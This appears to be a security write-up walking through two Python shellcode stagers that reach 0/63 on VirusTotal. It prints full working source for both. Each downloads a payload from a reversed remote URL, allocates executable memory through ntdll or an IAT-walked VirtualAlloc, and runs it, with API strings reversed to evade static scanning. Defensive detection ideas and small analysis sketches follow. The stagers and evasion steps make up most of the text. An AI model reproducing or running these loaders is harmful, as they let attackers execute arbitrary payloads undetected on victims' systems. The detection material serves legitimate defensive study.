Executive Summary
The g3tsyst3m blog post walks through two Python-based shellcode stagers that both achieve 0/63 on VirusTotal by attacking the weakest point in modern endpoint defence: static analysis. Variant 1 is a 135-line dropper that downloads a remote payload, reverses suspicious API strings (NtAllocateVirtualMemory, NtCreateThreadEx, memmove) so they never appear as plaintext tokens, allocates RWX memory through the NT-layer instead of kernel32, and spawns a thread to detonate the shellcode — no disk writes, no PE loader involvement, no obviously malicious imports. Variant 2 raises the bar: it skips VirtualAlloc entirely as a named symbol and instead parses the on-disk copy of pythonXY.dll with pefile, walks the Import Address Table looking for the reversed needle collAlautriV, computes the runtime IAT slot from base + RVA − ImageBase, dereferences it to read the live VirtualAlloc pointer the Windows loader wrote there at startup, and casts that pointer to a callable through ctypes.WINFUNCTYPE.
For defenders the takeaway is not the obfuscation tricks themselves, since reversed strings unwind in a sandbox in milliseconds; it is the choice of carrier. Python interpreters are an unusual and rarely monitored execution surface: legitimate Python rarely allocates RWX, rarely calls NtCreateThreadEx, and never walks the IAT of its own runtime DLL. The article ends with ten dynamic-analysis detection ideas that operate at exactly those behavioural seams, from ETW Microsoft-Windows-Threat-Intelligence ALLOCVM events out of interpreter processes to memory scanning of executable private pages after the decode happens. This post reproduces both stagers in full and unpacks each evasion mechanism phase by phase.
Why script interpreters as a carrier
There is no silver bullet for EDR bypass — the author opens with that observation, and with ML-assisted scoring now wired into most modern endpoint products the surface keeps shifting. What does work, repeatedly, is picking a host process that the defender’s telemetry treats as benign. Script interpreters — Python, Ruby, Perl, even PHP — sit in that sweet spot: they execute arbitrary user code but their on-disk artifacts (a .py file, a portable python.exe) are scrutinised far less aggressively than a compiled PE. PowerShell occupies the opposite extreme; threat actors have abused it so thoroughly that staying FUD inside powershell.exe is “incredibly difficult—but certainly not impossible.”
FUD Stager Variant #1
High-level overview
- Build the staging URL by reversing a string (SCODE_U[::-1]) so the destination never appears in cleartext.
- Download the raw shellcode bytes into memory over HTTPS.
- Allocate RWX memory through NtAllocateVirtualMemory (the NT-layer call, not the kernel32 wrapper) to slip past API hooks that monitor only the upper layer.
- Copy the bytes in with memmove.
- Detonate via NtCreateThreadEx with the new region as the start address.
- Every suspicious API name (_api, _api2, …) is stored reversed and resolved with getattr(ntdll, name[::-1]) at runtime.
The net effect is a 135-line in-memory dropper that never touches disk after the initial .py.
Part 1 — Bypassing static analysis
The first defensive layer to climb is not a behavioural sensor — it is the static scoring model. Two tricks do most of the work: rename or shorten any obvious offsec term (shellcode → scode, download_shellcode → dwnlod_scode), and store every flagged API name reversed so it gets unwound at runtime.
Two illustrative reversals:
_api = "yromeMlautriVetacollAtN"  # NtAllocateVirtualMemory reversed
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
Why string detection matters
Whether the engine is signature-based or model-based, almost every static layer ends up doing some form of token scoring. Strings like VirtualAlloc, CreateThread, NtAllocateVirtualMemory, and shellcode carry heavy malicious weight in any pretrained classifier. The goal is not invisibility but threshold management: stay under the score that triggers a block or a quarantine. Reversing the API strings and resolving them at runtime is, as the author puts it, “about as low-effort as obfuscation gets” — and it works precisely because a static engine, by definition, cannot execute your code to unwind the reversal.
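To make the threshold idea concrete, here is a toy sketch of token scoring. The weights, the threshold, and the function name token_score are assumptions invented for illustration, not values from any real engine. It shows the reversed literals scoring zero under a naive substring match, and the same signal reappearing once the scanner also looks for reversed forms.

```python
# Hypothetical weights; a real engine would learn these from data.
WEIGHTS = {
    "NtAllocateVirtualMemory": 8,
    "NtCreateThreadEx": 8,
    "VirtualAlloc": 5,
    "shellcode": 6,
}
THRESHOLD = 10  # assumed disposition threshold


def token_score(text: str, check_reversed: bool = False) -> int:
    """Sum the weights of flagged tokens found in text.

    With check_reversed=True, a token spelt backwards counts as well.
    """
    score = 0
    for token, weight in WEIGHTS.items():
        if token in text:
            score += weight
        if check_reversed and token[::-1] in text:
            score += weight
    return score


plain = 'a = getattr(ntdll, "NtAllocateVirtualMemory"); t = getattr(ntdll, "NtCreateThreadEx")'
obfuscated = 'a = getattr(ntdll, "yromeMlautriVetacollAtN"[::-1]); t = getattr(ntdll, "xEdaerhTetaerCtN"[::-1])'

for label, text in (("plain", plain), ("obfuscated", obfuscated)):
    naive = token_score(text)
    aware = token_score(text, check_reversed=True)
    print(f"{label}: naive={naive} reversal-aware={aware} blocked={aware >= THRESHOLD}")
```

The reversal-aware pass is the cheap static counter-move: the obfuscation only works while the scanner matches tokens in one direction.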
Variable names matter
Equally simple, equally effective: rename your variables, functions and even comments away from the giveaway tokens. download_shellcode is a gift to any analyst or scanner; dwnlod_scode won’t fool a human for long, but human reviewers are not the audience — the pre-execution scoring pass is. The point is to nudge the file’s aggregate token score below the disposition threshold.
Part 2 — Downloading the shellcode into memory
The shellcode lives in a public GitHub repo. The URL is stored reversed (SCODE_U) and unwound at runtime. To keep the hosted file itself off the obvious-extension radar, the author renames it to .dyno, an extension Windows does not associate with anything and which the author expects to draw less scrutiny than .bin would.
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True) # Stream for large files
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096)) # Load fully into bytes
print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
return shel_ly
except Exception as e:
print(f"[-] Dwnld failed: {e}")
return None
The function streams the response and returns the raw bytes as shel_ly. No open(), no write(), no on-disk artifact — the payload lives only as a Python bytes object until execution.
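From the defender's side, the reversed URL and API names are easy to recover without running anything. The sketch below walks a script's AST and reports string or bytes literals whose reverse contains a watched substring. The watch-list NEEDLES, the function name find_reversed_literals, and the example.com URL in the sample are assumptions for illustration.

```python
import ast

# Assumed watch-list; extend as needed.
NEEDLES = (
    "http://", "https://",
    "NtAllocateVirtualMemory", "NtCreateThreadEx",
    "VirtualAlloc", "memmove",
)


def find_reversed_literals(source: str) -> list[tuple[int, str]]:
    """Return (line, un-reversed value) for literals whose reverse contains a needle."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            value = node.value
            text = value.decode("latin-1") if isinstance(value, bytes) else value
            unreversed = text[::-1]
            if any(needle in unreversed for needle in NEEDLES):
                hits.append((node.lineno, unreversed))
    return sorted(hits)


# Benign sample input; only the literals matter, nothing is executed.
sample = '''
URL = "txt.elif/moc.elpmaxe//:sptth"
_api = "yromeMlautriVetacollAtN"
name = "hello"
'''

for line, value in find_reversed_literals(sample):
    print(f"line {line}: {value}")
```

Because the check works on parsed literals rather than raw text, it is indifferent to how the variables around them are named.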
Part 3 — Eggsecuting shellcode in memory 🥚
The author keeps the execution path deliberately plain (no direct syscalls, no advanced injection trick) just to see how far minimal obfuscation alone can carry the sample. The single concession to evasion is calling the NT layer in ntdll directly instead of the kernel32 wrappers, which places the calls below any user-mode hooks set only on the kernel32 layer.
Obfuscated Windows API calls
"eldnaHesolC"[::-1] -> CloseHandle
"tcejbOelgniSroFtiaW"[::-1] -> WaitForSingleObject
"yromeMlautriVetacollAtN"[::-1] -> NtAllocateVirtualMemory
"xEdaerhTetaerCtN"[::-1] -> NtCreateThreadEx
"evommem"[::-1] -> memmove
Allocating executable memory through the NT API
NtAllocateVirtualMemory (the lower-level cousin of VirtualAlloc exported from ntdll) requests a region in the current process with the classic offensive triple: MEM_COMMIT | MEM_RESERVE for the allocation type and PAGE_EXECUTE_READWRITE for the protection. Textbook RWX.
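When triaging allocation telemetry, it helps to turn the raw flag values into names. The sketch below decodes the allocation type and protection fields using the documented Win32 constants; the function name describe_allocation and the shape of its return value are assumptions for illustration.

```python
# Documented Win32 memory-protection constants.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
ALLOCATION_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}


def describe_allocation(alloc_type: int, protect: int) -> dict:
    """Decode allocation-type and protection flags into readable names."""
    base = protect & 0xFF  # drop modifier bits such as PAGE_GUARD (0x100)
    return {
        "types": [name for bit, name in ALLOCATION_TYPES.items() if alloc_type & bit],
        "protection": PAGE_PROTECTIONS.get(base, f"unknown (0x{base:02x})"),
        "writable_and_executable": base in (0x40, 0x80),
    }


# The values used by both stagers: 0x3000 and 0x40.
print(describe_allocation(0x3000, 0x40))
# An ordinary heap-style allocation for comparison.
print(describe_allocation(0x1000, 0x04))
```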
Copy and execute
memmove (also resolved by string reversal) blits the downloaded bytes into the freshly allocated RWX region. Then NtCreateThreadEx spawns a thread inside the current process with the start address pointed at the beginning of the shellcode. WaitForSingleObject blocks for up to ten seconds for the thread to finish, then CloseHandle tidies up.
def eggsecute_scode(scode2):
# Constants
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
kernel32 = ctypes.windll.kernel32
ntdll = ctypes.windll.ntdll
_api4 = "eldnaHesolC"
closingtime = getattr(kernel32, _api4[::-1])
closingtime.restype = wintypes.DWORD
closingtime.argtypes = [
wintypes.HANDLE, # hHandle
]
_api3 = "tcejbOelgniSroFtiaW"
waitinaround = getattr(kernel32, _api3[::-1])
waitinaround.restype = wintypes.DWORD
waitinaround.argtypes = [
wintypes.HANDLE, # hHandle
wintypes.DWORD, # dwMilliseconds
]
_api = "yromeMlautriVetacollAtN" #
Allocator = getattr(ntdll, _api[::-1])
Allocator.restype = wintypes.BOOL
Allocator.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(wintypes.LPVOID),
ctypes.c_void_p,
ctypes.POINTER(ctypes.c_size_t),
wintypes.DWORD,
wintypes.DWORD,
]
_api2 = "xEdaerhTetaerCtN"
thred_the_needle = getattr(ntdll, _api2[::-1])
thred_the_needle.restype = wintypes.LONG # NTSTATUS
thred_the_needle.argtypes = [
ctypes.POINTER(wintypes.HANDLE), # ThredHandel (out)
ctypes.c_ulong, # DesiredAccess
ctypes.c_void_p, # ObjectAttributes
wintypes.HANDLE, # ProcessHandle
ctypes.c_void_p, # StartRoutine (your scode addr)
ctypes.c_void_p, # Argument
ctypes.c_ulong, # CrateFlags (0 = run immediately)
ctypes.c_size_t, # ZeroBits
ctypes.c_size_t, # StackSize
ctypes.c_size_t, # MaximumStackSize
ctypes.c_void_p, # AttributeList
]
addr = wintypes.LPVOID(0)
size = ctypes.c_size_t(len(scode2))
current_process = wintypes.HANDLE(-1)
status = Allocator(
current_process,
ctypes.byref(addr),
0,
ctypes.byref(size),
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE
)
if status == 0: # NTSTATUS 0 = success
mem_addr = addr.value
print(f"[+] Allcted mem at: 0x{mem_addr:x}")
_api0 = "evommem"
m3mMov3r = getattr(ctypes, _api0[::-1])
m3mMov3r(mem_addr, scode2, len(scode2))
print("[+] Scode copied to memory")
h_thread = wintypes.HANDLE(0)
status2 = thred_the_needle(
ctypes.byref(h_thread),
0x1FFFFF, # THRED_ALL_ACCESS
None,
current_process,
ctypes.cast(mem_addr, ctypes.c_void_p), # scode start address
None,
0, # no flags, start immediately
0,
0,
0,
None
)
if status2 == 0:
print(f"[+] Thredded Needle!")
waitinaround(h_thread.value, 10000)
closingtime(h_thread.value)
else:
print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")
else:
print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")
Bringing it all together
One hundred and thirty-five lines of Python, and an effective in-memory shellcode runner with no disk write. At submission time the sample scored 0/63 on VirusTotal — FUD achieved.



Full source — Variant #1
#27e51de6e6a555bc622a3769ee030bfd92079022780ca8bb33958479562dfc6e
import requests
import ctypes
from ctypes import wintypes
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True) # Stream for large files
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096)) # Load fully into bytes
print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
print(shel_ly)
return shel_ly
except Exception as e:
print(f"[-] Dwnld failed: {e}")
return None
def eggsecute_scode(scode2):
# Constants
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
kernel32 = ctypes.windll.kernel32
ntdll = ctypes.windll.ntdll
_api4 = "eldnaHesolC"
closingtime = getattr(kernel32, _api4[::-1])
closingtime.restype = wintypes.DWORD
closingtime.argtypes = [
wintypes.HANDLE, # hHandle
]
_api3 = "tcejbOelgniSroFtiaW"
waitinaround = getattr(kernel32, _api3[::-1])
waitinaround.restype = wintypes.DWORD
waitinaround.argtypes = [
wintypes.HANDLE, # hHandle
wintypes.DWORD, # dwMilliseconds
]
_api = "yromeMlautriVetacollAtN" #
Allocator = getattr(ntdll, _api[::-1])
Allocator.restype = wintypes.BOOL
Allocator.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(wintypes.LPVOID),
ctypes.c_void_p,
ctypes.POINTER(ctypes.c_size_t),
wintypes.DWORD,
wintypes.DWORD,
]
_api2 = "xEdaerhTetaerCtN"
thred_the_needle = getattr(ntdll, _api2[::-1])
thred_the_needle.restype = wintypes.LONG # NTSTATUS
thred_the_needle.argtypes = [
ctypes.POINTER(wintypes.HANDLE), # ThredHandel (out)
ctypes.c_ulong, # DesiredAccess
ctypes.c_void_p, # ObjectAttributes
wintypes.HANDLE, # ProcessHandle
ctypes.c_void_p, # StartRoutine (your scode addr)
ctypes.c_void_p, # Argument
ctypes.c_ulong, # CrateFlags (0 = run immediately)
ctypes.c_size_t, # ZeroBits
ctypes.c_size_t, # StackSize
ctypes.c_size_t, # MaximumStackSize
ctypes.c_void_p, # AttributeList
]
addr = wintypes.LPVOID(0)
size = ctypes.c_size_t(len(scode2))
current_process = wintypes.HANDLE(-1)
status = Allocator(
current_process,
ctypes.byref(addr),
0,
ctypes.byref(size),
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE
)
if status == 0: # NTSTATUS 0 = success
mem_addr = addr.value
print(f"[+] Allcted mem at: 0x{mem_addr:x}")
_api0 = "evommem"
m3mMov3r = getattr(ctypes, _api0[::-1])
m3mMov3r(mem_addr, scode2, len(scode2))
print("[+] Scode copied to memory")
h_thread = wintypes.HANDLE(0)
status2 = thred_the_needle(
ctypes.byref(h_thread),
0x1FFFFF, # THRED_ALL_ACCESS
None,
current_process,
ctypes.cast(mem_addr, ctypes.c_void_p), # scode start address
None,
0, # no flags, start immediately
0,
0,
0,
None
)
if status2 == 0:
print(f"[+] Thredded Needle!")
waitinaround(h_thread.value, 10000)
closingtime(h_thread.value)
else:
print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")
else:
print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")
if __name__ == "__main__":
print("[*] Dwnlding scode from URL...")
scode = dwnlod_scode(SCODE_U)
if scode:
print("[*] Eggsecuting Scode in mem...")
eggsecute_scode(scode)
else:
print("[-] Aborting.")
FUD Stager Variant #2
High-level overview
Variant #2 removes VirtualAlloc from the static surface entirely. Instead of looking the symbol up (via GetProcAddress or even via reversed-string indirection through ctypes), it borrows what the Python interpreter has already loaded: the kernel32 import resolved into pythonXY.dll’s IAT. The runtime address of VirtualAlloc is sitting in memory the moment Python is running — you just have to walk to it. The assumption is a portable Python (so the on-disk pythonXY.dll is available for PE parsing).
The resolved IAT pointer becomes a typed function pointer (ctypes.WINFUNCTYPE), giving the stager direct callable access to VirtualAlloc without ever naming the symbol explicitly. No direct API call. No obvious import. No GetProcAddress. Static analysis loses another anchor.

python314.dll base address, IAT-resolved VirtualAlloc pointer, RWX page allocated. Source: original article.
copy_to_page copies the downloaded bytes and exec_page invokes the cast function pointer. Source: original article.
Part 1 — The familiar downloader
The opening is intentionally identical to Variant #1 — the URL is stored reversed, the variable is renamed to SCODE_U, the download path drops the bytes into a Python bytes object. New here is the conditional pefile import.
import ctypes, sys, os
import requests
try:
import pefile
except ImportError:
print("pip install pefile"); sys.exit(1)
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True)
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096))
print(f"[+] Downloaded {len(shel_ly)} bytes")
return shel_ly
except Exception as e:
print(f"[-] Download failed: {e}"); return None
Part 2 — Copy/exec helpers
Two short helpers: copy_to_page uses ctypes.memmove to blit the shellcode into the RWX region, and exec_page casts that page address to a void(*)(void) through ctypes.WINFUNCTYPE(None) and calls it. Note ctypes accepts a Python bytes object directly as the src argument to memmove, which keeps the call site clean.
def copy_to_page(page: int, scode: bytes) -> bool:
"""Copy scode bytes into the RWX page via ctypes.memmove."""
if not page:
print("[-] Invalid page address"); return False
if len(scode) > 0x1000:
print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False
# memmove(dst, src, count)
# dst = raw integer address of our RWX page
# src = scode bytes (ctypes accepts bytes directly as src)
ctypes.memmove(page, scode, len(scode))
print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
return True
def exec_page(page: int):
"""Cast the page to a void(*)(void) and call it."""
thunk = ctypes.WINFUNCTYPE(None)(page)
print(f"[+] Executing scode @ 0x{page:016x}")
thunk()
Part 3 — Walking the IAT to locate VirtualAlloc
Phase 1 — build the DLL name and path dynamically
Compose pythonXY.dll from sys.version_info at runtime — python313.dll, python314.dll, whatever the interpreter happens to be. The on-disk dll_path is what pefile will read to parse section headers, the import directory, and ImageBase. The same code works across every Python minor release with no edits.
ver = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)
Phase 2 — live in-memory base address
GetModuleHandleW returns the base address of the already-loaded module — no new mapping, no disk read. Python is running, so pythonXY.dll is resident. The explicit restype = c_void_p is important: without it ctypes would truncate the 64-bit address to a signed 32-bit int.
k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
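The truncation that the explicit restype avoids can be shown in isolation, without calling any Windows API. In this sketch the address is a made-up value; ctypes.c_int stands in for the default return type that ctypes assumes for foreign functions, and the c_void_p line assumes a 64-bit Python build.

```python
import ctypes

address = 0x00007FFBF2340000  # hypothetical 64-bit module base

# ctypes integer types do no overflow checking: only the low 32 bits survive,
# and they are reinterpreted as a signed value.
as_c_int = ctypes.c_int(address).value

# A pointer-sized type keeps the whole value on a 64-bit build.
as_void_p = ctypes.c_void_p(address).value

print(f"original : 0x{address:016x}")
print(f"c_int    : {as_c_int} (0x{as_c_int & 0xFFFFFFFF:08x})")
print(f"c_void_p : 0x{as_void_p:016x}")
```

Any address arithmetic done on the truncated value would point somewhere unrelated, which is why the pointer-sized restype matters before the base is used further.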
Phase 3 — parse the on-disk PE
Read the same DLL from disk just for its layout: section headers, import directory offsets, ImageBase. With fast_load=False, pefile performs a full parse at construction, so the import table is already materialised; the explicit parse_data_directories() call that follows is redundant but harmless.
pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()
Phase 4 — walk the IAT, resolve the live pointer
Filter to kernel32.dll imports only and match against b"VirtualAlloc" — which never appears in plaintext because the bytestring b"collAlautriV" is reversed at compare time. For the match, imp.address is the on-disk VA of the IAT slot; subtracting pe.OPTIONAL_HEADER.ImageBase converts it to an RVA; adding the live base converts the RVA into the actual runtime address of the slot. c_uint64.from_address(slot).value dereferences the eight-byte pointer the Windows loader wrote there at startup. The result va_va is the live, post-ASLR, post-loader-resolution runtime address of VirtualAlloc, ready to be cast to a callable.
memprep = b"collAlautriV" # "VirtualAlloc" reversed
for entry in pe.DIRECTORY_ENTRY_IMPORT:
if b'kernel32' in entry.dll.lower():
for imp in entry.imports:
if imp.name == memprep[::-1]:
slot = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
va_va = ctypes.c_uint64.from_address(slot).value
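The address arithmetic in this phase is ordinary PE rebasing, the same calculation a debugger performs when mapping a file address onto a loaded module. A worked example with made-up numbers may help; the helper name rebase and all three addresses are hypothetical.

```python
def rebase(preferred_va: int, image_base: int, live_base: int) -> int:
    """Translate an address computed against the preferred ImageBase
    into the address it has once the module is loaded at live_base."""
    rva = preferred_va - image_base  # offset from the start of the image
    return live_base + rva


image_base = 0x180000000      # hypothetical preferred ImageBase from the PE header
slot_va = 0x1803A5128         # hypothetical on-disk VA of one IAT slot
live_base = 0x7FFB12340000    # hypothetical base chosen by ASLR at load time

rva = slot_va - image_base
runtime_slot = rebase(slot_va, image_base, live_base)

print(f"RVA          : 0x{rva:x}")
print(f"runtime slot : 0x{runtime_slot:x}")
```

The RVA is the only part that survives relocation, which is why the on-disk file and the in-memory module can be combined this way.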
Part 4 — cast and execute
ctypes.WINFUNCTYPE turns the raw va_va integer into a typed callable whose signature mirrors VirtualAlloc: returns void*, takes void*, SIZE_T, DWORD, DWORD. Calling it with NULL, 0x1000, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40) returns a fresh RWX page, without a single direct reference to the function name anywhere in the script text.
MemoryAllocator = ctypes.WINFUNCTYPE(
ctypes.c_void_p,
ctypes.c_void_p, ctypes.c_size_t,
ctypes.c_uint32, ctypes.c_uint32
)(va_va) # <--here's where we cast it
page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")
if page:
print("[+] allocated!")
Then the familiar finale: download the shellcode, copy it into the page, jump to it. The cleanup block (VirtualFree with MEM_RELEASE = 0x8000) only runs if the shellcode returns — which most reverse-shell payloads don’t.
# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
# page = your VAlloc result from earlier
if copy_to_page(page, scode):
exec_page(page)
# ── cleanup (only reached if shellcode returns) ───────────────────────────────
k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
print("[*] freed")
VirusTotal results 💊
Hash: 6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6

Full source — Variant #2
#6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6
import ctypes, sys, os
import requests
try:
import pefile
except ImportError:
print("pip install pefile"); sys.exit(1)
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True)
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096))
print(f"[+] Downloaded {len(shel_ly)} bytes")
return shel_ly
except Exception as e:
print(f"[-] Download failed: {e}"); return None
def copy_to_page(page: int, scode: bytes) -> bool:
"""Copy scode bytes into the RWX page via ctypes.memmove."""
if not page:
print("[-] Invalid page address"); return False
if len(scode) > 0x1000:
print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False
# memmove(dst, src, count)
# dst = raw integer address of our RWX page
# src = scode bytes (ctypes accepts bytes directly as src)
ctypes.memmove(page, scode, len(scode))
print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
return True
def exec_page(page: int):
"""Cast the page to a void(*)(void) and call it."""
thunk = ctypes.WINFUNCTYPE(None)(page)
print(f"[+] Executing scode @ 0x{page:016x}")
thunk()
ver = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)
k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
print(f"[*] {dll_name} @ 0x{base:016x}")
pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()
memprep=b"collAlautriV"
va_va = 0
for entry in pe.DIRECTORY_ENTRY_IMPORT:
if b'kernel32' in entry.dll.lower():
for imp in entry.imports:
if imp.name == memprep[::-1]:
slot = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
va_va = ctypes.c_uint64.from_address(slot).value
break
if not va_va:
print("[-] collAlautriV not found in IAT"); sys.exit(1)
print(f"[+] collAlautriV @ 0x{va_va:016x}")
MemoryAllocator = ctypes.WINFUNCTYPE(
ctypes.c_void_p,
ctypes.c_void_p, ctypes.c_size_t,
ctypes.c_uint32, ctypes.c_uint32
)(va_va)
page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")
if page:
print("[+] allocated!")
# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
# page = your VAlloc result from earlier
if copy_to_page(page, scode):
exec_page(page)
# ── cleanup (only reached if shellcode returns) ───────────────────────────────
k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
print("[*] freed")
Key Takeaways
- String reversal beats token scoring. "yromeMlautriVetacollAtN"[::-1] is a one-line trick that erases the most heavily-weighted feature from a static classifier’s view. Same logic for variable names.
- Carrier choice matters more than the obfuscation. A Python interpreter is an unusual but legitimate process; a malicious PE is not. Both stagers achieve 0/63 on VirusTotal largely because the file under analysis is a .py, not an EXE.
- NT-layer APIs slip past hooks placed only on the upper layer. Products that instrument only the kernel32 wrappers miss the ntdll entry points, although many EDRs also hook ntdll itself. On the static side this carries no opsec cost.
- IAT walking removes the symbol from the surface entirely. If the host process has already loaded the function you want, the loader has already written its live address into the IAT, so you just have to parse the PE, locate the slot, and dereference. No GetProcAddress, no import you control.
- RWX in one shot is still legal in Win32. No VirtualProtect two-step needed; both stagers allocate executable-and-writable straight from the allocator. That’s a strong behavioural signal: cheap to detect dynamically, invisible statically.
- 0/63 is a static metric, not a behavioural one. The author is explicit that dynamic detection of these stagers is straightforward; the entire technique lives in the pre-execution window.
Defensive Recommendations
The original article closes with ten dynamic-detection ideas. Restated here in deployment-friendly form:
- Alert on RWX allocations originating from python.exe (and other interpreter binaries). Legitimate Python workloads almost never request PAGE_EXECUTE_READWRITE.
- Consume the ETW Microsoft-Windows-Threat-Intelligence provider and alert on ALLOCVM events with execute permissions emitted by interpreter processes.
- Detect execution out of private, non-image-backed memory regions. Anything calling code from a private commit that isn’t mapped from a PE on disk is high signal.
- Correlate outbound network → allocation → execution within one process lifetime. The temporal chain is the giveaway, not any single event.
- Track python-requests User-Agent strings, especially when talking to anonymous file hosts or raw-file CDNs.
- Flag NtAllocateVirtualMemory / NtCreateThreadEx originating from Python interpreters. Direct NT-layer use from a script interpreter is anomalous on its own.
- Sandbox-detonate unknown .py files with full API call tracing. Reversed strings unwind into plaintext in dynamic traces; what disappears statically is plainly visible at runtime.
- Alert on python.exe with no console / GUI parent making outbound connections. The execution context shape (orphan interpreter, network egress) is detectable.
- Detect pefile import activity at runtime. A running Python process parsing a PE is unusual outside of explicit RE / dev tooling.
- Scan execute-permission private regions periodically. Shellcode signatures that evade static scanning are often trivially detectable in-memory after decoding.
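Several of these ideas reduce to one correlation: an interpreter process that shows network egress, an RWX allocation, and execution from private memory close together in time. The sketch below runs that correlation over already-normalised events. The Event schema, the event kind names, the interpreter list, and the 60-second window are all assumptions for illustration; real telemetry would need mapping into this shape. Order is deliberately not enforced, since Variant #2 allocates its page before it downloads.

```python
from dataclasses import dataclass

INTERPRETERS = {"python.exe", "pythonw.exe"}            # assumed watch-list
REQUIRED = {"net_connect", "alloc_rwx", "exec_private"}  # assumed event kinds
WINDOW_SECONDS = 60.0                                    # assumed correlation window


@dataclass
class Event:
    ts: float    # seconds since some epoch
    pid: int
    image: str   # process image name
    kind: str    # normalised event kind


def find_suspect_pids(events: list[Event]) -> list[int]:
    """Return PIDs of interpreter processes showing every REQUIRED kind within one window."""
    by_pid: dict[int, list[Event]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.image.lower() in INTERPRETERS:
            by_pid.setdefault(ev.pid, []).append(ev)

    flagged = []
    for pid, evs in by_pid.items():
        for start in evs:
            # Kinds seen from this event up to WINDOW_SECONDS later.
            kinds = {e.kind for e in evs if 0 <= e.ts - start.ts <= WINDOW_SECONDS}
            if REQUIRED <= kinds:
                flagged.append(pid)
                break
    return sorted(flagged)


events = [
    Event(1.0, 100, "python.exe", "net_connect"),
    Event(1.5, 100, "python.exe", "alloc_rwx"),
    Event(2.0, 100, "python.exe", "exec_private"),
    Event(1.0, 200, "python.exe", "net_connect"),    # network only
    Event(1.0, 300, "chrome.exe", "net_connect"),    # not an interpreter
    Event(1.2, 300, "chrome.exe", "alloc_rwx"),
    Event(1.4, 300, "chrome.exe", "exec_private"),
    Event(0.0, 400, "python.exe", "alloc_rwx"),      # too spread out in time
    Event(10.0, 400, "python.exe", "net_connect"),
    Event(500.0, 400, "python.exe", "exec_private"),
]

print(find_suspect_pids(events))
```

Keying the rule on the combination rather than on any single event keeps the false-positive rate manageable, which matches the article's point that the temporal chain is the giveaway.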
Conclusion
